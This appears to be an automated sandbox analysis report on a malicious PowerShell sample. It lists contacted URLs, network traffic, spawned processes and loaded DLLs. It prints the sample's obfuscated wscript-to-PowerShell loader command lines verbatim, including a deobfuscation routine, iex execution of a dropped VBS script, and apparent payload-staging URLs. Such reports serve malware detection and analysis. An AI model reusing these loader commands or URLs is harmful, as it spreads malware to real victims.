          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdf
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/ov/wh.vbs
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbs
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.5:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.5:49765 version: TLS 1.2

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. Col
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. ColJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8022
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8022Jump to behavior
          Source: classification engineClassification label: mal100.expl.evad.winPS1@11/13@6/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrlxcjd2.qka.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: ni.ps1ReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. Col
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. ColJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
